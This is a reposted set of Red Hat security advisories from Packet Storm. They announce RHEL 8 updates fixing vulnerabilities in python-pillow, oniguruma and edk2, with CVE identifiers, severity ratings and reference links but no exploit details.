?id=2258788https://bugzilla.redhat.com/show_bug.cgi?id=2258789https://bugzilla.redhat.com/show_bug.cgi?id=2258790https://bugzilla.redhat.com/show_bug.cgi?id=2258791https://bugzilla.redhat.com/show_bug.cgi?id=2258792https://bugzilla.redhat.com/show_bug.cgi?id=2258793https://bugzilla.redhat.com/show_bug.cgi?id=2258794

Red Hat Security Advisory 2024-0894-03

Red Hat Security Advisory 2024-0893-03 - An update for python-pillow is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0893.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-pillow security updateAdvisory ID:        RHSA-2024:0893-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0893Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-50447====================================================================Summary: An update for python-pillow is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* pillow: Arbitrary Code Execution via the environment parameter (CVE-2023-50447)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50447References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2259479

Red Hat Security Advisory 2024-0893-03

Red Hat Security Advisory 2024-0889-03 - An update for oniguruma is now available for Red Hat Enterprise Linux 8. Issues addressed include buffer over-read, integer overflow, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0889.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: oniguruma security update  
Advisory ID:        RHSA-2024:0889-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0889  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2019-13224  
====================================================================

Summary: 

An update for oniguruma is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Oniguruma is a regular expressions library that supports a variety of character encodings. 

Security Fix(es):

* oniguruma: Use-after-free in onig_new_deluxe() in regext.c (CVE-2019-13224)

* oniguruma: Stack exhaustion in regcomp.c because of recursion in regparse.c (CVE-2019-16163)

* oniguruma: integer overflow in search_in_range function in regexec.c leads to out-of-bounds read (CVE-2019-19012)

* oniguruma: Heap-based buffer over-read in function gb18030_mbc_enc_len in file gb18030.c (CVE-2019-19203)

* oniguruma: Heap-based buffer over-read in function fetch_interval_quantifier in regparse.c (CVE-2019-19204)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2019-13224

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=1728970  
https://bugzilla.redhat.com/show_bug.cgi?id=1768997  
https://bugzilla.redhat.com/show_bug.cgi?id=1802051  
https://bugzilla.redhat.com/show_bug.cgi?id=1802061  
https://bugzilla.redhat.com/show_bug.cgi?id=1802068

Red Hat Security Advisory 2024-0889-03

Red Hat Security Advisory 2024-0888-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0888.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: edk2 security updateAdvisory ID:        RHSA-2024:0888-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0888Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-3446====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3446References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2224962

Tag

#linux